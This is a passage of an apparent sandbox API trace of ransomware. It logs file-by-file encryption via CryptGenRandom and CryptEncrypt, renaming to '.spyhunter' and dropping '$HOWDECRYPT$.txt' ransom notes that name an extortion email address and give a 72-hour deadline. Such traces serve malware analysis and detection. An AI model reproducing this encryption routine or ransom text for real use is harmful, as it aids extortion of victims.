lpBuffer=0x57ef3c*, lpNumberOfBytesWritten=0x57eefc*=0x4, lpOverlapped=0x0) returned 1 [0146.404] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eefc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eefc*=0x30, lpOverlapped=0x0) returned 1 [0146.404] CloseHandle (hObject=0x9c) returned 1 [0146.427] GetProcessHeap () returned 0x2c0000 [0146.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0146.427] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll.spyhunter") returned 85 [0146.427] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\onintl.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\onintl.rest.trx_dll.spyhunter")) returned 1 [0146.428] GetProcessHeap () returned 0x2c0000 [0146.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0146.428] GetProcessHeap () returned 0x2c0000 [0146.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0146.428] GetProcessHeap () returned 0x2c0000 [0146.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5fa8 | out: hHeap=0x2c0000) returned 1 [0146.429] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ef40 | out: pbBuffer=0x57ef40) returned 1 [0146.429] GetProcessHeap () returned 0x2c0000 [0146.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0146.429] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ef38*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ef38*=0x30) returned 1 [0146.429] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\msointl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0146.430] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll") returned 76 [0146.430] StrStrW (lpFirst="MSOINTL.REST.trx_dll", lpSrch=".txt") returned 0x0 [0146.430] GetProcessHeap () returned 0x2c0000 [0146.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0146.430] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eefc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57eefc*=0x2800, lpOverlapped=0x0) returned 1 [0146.437] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0146.437] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57eefc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57eefc*=0x2800, lpOverlapped=0x0) returned 1 [0146.437] GetProcessHeap () returned 0x2c0000 [0146.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0146.437] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.437] WriteFile (in: hFile=0x9c, lpBuffer=0x57ef3c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eefc, lpOverlapped=0x0 | out: lpBuffer=0x57ef3c*, lpNumberOfBytesWritten=0x57eefc*=0x4, lpOverlapped=0x0) returned 1 [0146.438] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eefc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eefc*=0x30, lpOverlapped=0x0) returned 1 [0146.438] CloseHandle (hObject=0x9c) returned 1 [0146.438] GetProcessHeap () returned 0x2c0000 [0146.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0146.438] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll.spyhunter") returned 86 [0146.438] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\msointl.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\msointl.rest.trx_dll.spyhunter")) returned 1 [0146.439] GetProcessHeap () returned 0x2c0000 [0146.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0146.439] GetProcessHeap () returned 0x2c0000 [0146.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0146.439] GetProcessHeap () returned 0x2c0000 [0146.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f306f0 | out: hHeap=0x2c0000) returned 1 [0146.439] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ef38 | out: pbBuffer=0x57ef38) returned 1 [0146.439] GetProcessHeap () returned 0x2c0000 [0146.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0146.440] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ef30*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ef30*=0x30) returned 1 [0146.440] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\mor6int.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0146.441] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll") returned 76 [0146.441] StrStrW (lpFirst="MOR6INT.REST.trx_dll", lpSrch=".txt") returned 0x0 [0146.441] GetProcessHeap () returned 0x2c0000 [0146.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0146.441] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eef4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57eef4*=0x2800, lpOverlapped=0x0) returned 1 [0146.450] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0146.450] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57eef4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57eef4*=0x2800, lpOverlapped=0x0) returned 1 [0146.450] GetProcessHeap () returned 0x2c0000 [0146.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0146.450] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.450] WriteFile (in: hFile=0x9c, lpBuffer=0x57ef34*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eef4, lpOverlapped=0x0 | out: lpBuffer=0x57ef34*, lpNumberOfBytesWritten=0x57eef4*=0x4, lpOverlapped=0x0) returned 1 [0146.458] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eef4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eef4*=0x30, lpOverlapped=0x0) returned 1 [0146.458] CloseHandle (hObject=0x9c) returned 1 [0146.458] GetProcessHeap () returned 0x2c0000 [0146.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0146.458] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll.spyhunter") returned 86 [0146.458] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\mor6int.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\mor6int.rest.trx_dll.spyhunter")) returned 1 [0146.458] GetProcessHeap () returned 0x2c0000 [0146.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0146.459] GetProcessHeap () returned 0x2c0000 [0146.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0146.459] GetProcessHeap () returned 0x2c0000 [0146.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f30608 | out: hHeap=0x2c0000) returned 1 [0146.459] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ef38 | out: pbBuffer=0x57ef38) returned 1 [0146.459] GetProcessHeap () returned 0x2c0000 [0146.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0146.459] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ef30*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ef30*=0x30) returned 1 [0146.459] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\envelopr.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0146.459] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll") returned 76 [0146.459] StrStrW (lpFirst="ENVELOPR.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0146.459] GetProcessHeap () returned 0x2c0000 [0146.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0146.459] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eef4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57eef4*=0x2800, lpOverlapped=0x0) returned 1 [0146.469] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0146.469] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57eef4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57eef4*=0x2800, lpOverlapped=0x0) returned 1 [0146.469] GetProcessHeap () returned 0x2c0000 [0146.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0146.469] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.470] WriteFile (in: hFile=0x9c, lpBuffer=0x57ef34*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eef4, lpOverlapped=0x0 | out: lpBuffer=0x57ef34*, lpNumberOfBytesWritten=0x57eef4*=0x4, lpOverlapped=0x0) returned 1 [0146.520] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eef4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eef4*=0x30, lpOverlapped=0x0) returned 1 [0146.520] CloseHandle (hObject=0x9c) returned 1 [0146.520] GetProcessHeap () returned 0x2c0000 [0146.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0146.520] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll.spyhunter") returned 86 [0146.521] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\envelopr.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\envelopr.dll.trx_dll.spyhunter")) returned 1 [0146.521] GetProcessHeap () returned 0x2c0000 [0146.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0146.521] GetProcessHeap () returned 0x2c0000 [0146.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0146.521] GetProcessHeap () returned 0x2c0000 [0146.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f30350 | out: hHeap=0x2c0000) returned 1 [0146.522] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\event viewer\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0146.522] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0146.522] WriteFile (in: hFile=0x9c, lpBuffer=0x57ee67*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ef90, lpOverlapped=0x0 | out: lpBuffer=0x57ee67*, lpNumberOfBytesWritten=0x57ef90*=0x127, lpOverlapped=0x0) returned 1 [0146.523] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0146.523] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ef90, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ef90*=0x2ac, lpOverlapped=0x0) returned 1 [0146.523] CloseHandle (hObject=0x9c) returned 1 [0146.523] GetProcessHeap () returned 0x2c0000 [0146.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3030150 | out: hHeap=0x2c0000) returned 1 [0146.523] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\event viewer\\views\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0146.523] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0146.524] WriteFile (in: hFile=0x9c, lpBuffer=0x57ee63*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ef8c, lpOverlapped=0x0 | out: lpBuffer=0x57ee63*, lpNumberOfBytesWritten=0x57ef8c*=0x127, lpOverlapped=0x0) returned 1 [0146.524] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0146.524] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ef8c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ef8c*=0x2ac, lpOverlapped=0x0) returned 1 [0146.526] CloseHandle (hObject=0x9c) returned 1 [0146.526] GetProcessHeap () returned 0x2c0000 [0146.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2feee18 | out: hHeap=0x2c0000) returned 1 [0146.526] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\event viewer\\views\\applicationviewsrootnode\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0146.526] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0146.526] WriteFile (in: hFile=0x9c, lpBuffer=0x57ee5f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ef88, lpOverlapped=0x0 | out: lpBuffer=0x57ee5f*, lpNumberOfBytesWritten=0x57ef88*=0x127, lpOverlapped=0x0) returned 1 [0146.527] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0146.527] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ef88, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ef88*=0x2ac, lpOverlapped=0x0) returned 1 [0146.527] CloseHandle (hObject=0x9c) returned 1 [0146.527] GetProcessHeap () returned 0x2c0000 [0146.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f62380 | out: hHeap=0x2c0000) returned 1 [0146.527] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\ehome\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.527] GetProcessHeap () returned 0x2c0000 [0146.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffba68 | out: hHeap=0x2c0000) returned 1 [0146.527] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\ehome\\logs\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.528] GetProcessHeap () returned 0x2c0000 [0146.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3030088 | out: hHeap=0x2c0000) returned 1 [0146.528] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\drm\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0146.528] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0146.528] WriteFile (in: hFile=0x9c, lpBuffer=0x57ee53*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ef7c, lpOverlapped=0x0 | out: lpBuffer=0x57ee53*, lpNumberOfBytesWritten=0x57ef7c*=0x127, lpOverlapped=0x0) returned 1 [0146.531] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0146.531] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ef7c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ef7c*=0x2ac, lpOverlapped=0x0) returned 1 [0146.531] CloseHandle (hObject=0x9c) returned 1 [0146.531] GetProcessHeap () returned 0x2c0000 [0146.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a2fc0 | out: hHeap=0x2c0000) returned 1 [0146.532] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\drm\\server\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0146.532] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will 